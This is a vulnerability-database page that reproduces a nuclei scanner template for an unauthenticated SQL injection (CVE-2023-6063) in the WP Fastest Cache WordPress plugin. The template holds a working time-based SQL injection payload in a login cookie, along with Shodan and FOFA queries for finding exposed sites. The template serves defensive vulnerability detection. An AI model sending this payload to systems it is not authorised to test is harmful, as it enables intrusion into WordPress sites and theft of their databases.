Lucene search
K

WP Fastest Cache 1.2.2 - SQL Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 161 Views

WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection. The WordPress plugin doesn't sanitize a parameter, leading to SQL injection

Related
Refs
Code
id: CVE-2023-6063

info:
  name: WP Fastest Cache 1.2.2 - SQL Injection
  author: DhiyaneshDK
  severity: high
  description: |
    The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
  impact: |
    Unauthenticated attackers can execute SQL injection to extract the complete WordPress database including user credentials and site data.
  remediation: Fixed in 1.2.2
  reference:
    - https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/
    - https://wordpress.org/plugins/wp-fastest-cache/
    - https://github.com/motikan2010/CVE-2023-6063-PoC
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6063
    - https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6063
    cwe-id: CWE-89
    epss-score: 0.73708
    epss-percentile: 0.99409
    cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wpfastestcache
    product: "wp_fastest_cache"
    framework: wordpress
    shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/"
    fofa-query: "body=/wp-content/plugins/wp-fastest-cache/"
    publicwww-query: "/wp-content/plugins/wp-fastest-cache/"
  tags: time-based-sqli,cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin,sqli,wpfastestcache,vuln
flow: |
    if (http(1)) {
        for (let i = 0; i < 2; i++) {
            http(2);
        }}

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "WP Fastest Cache")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND "tqKU"="tqKU

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(body, "/wp-")'
        condition: and
# digest: 4a0a004730450220032f9fa57bc0252bd47e236ef306aa4d83e4d8c0e263be22334d13fd02bc221b022100ac81a97bf2e2dfa76c953f448b275ef061daebbde9cc0fb79ba90909b405b437:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
EPSS0.73708
161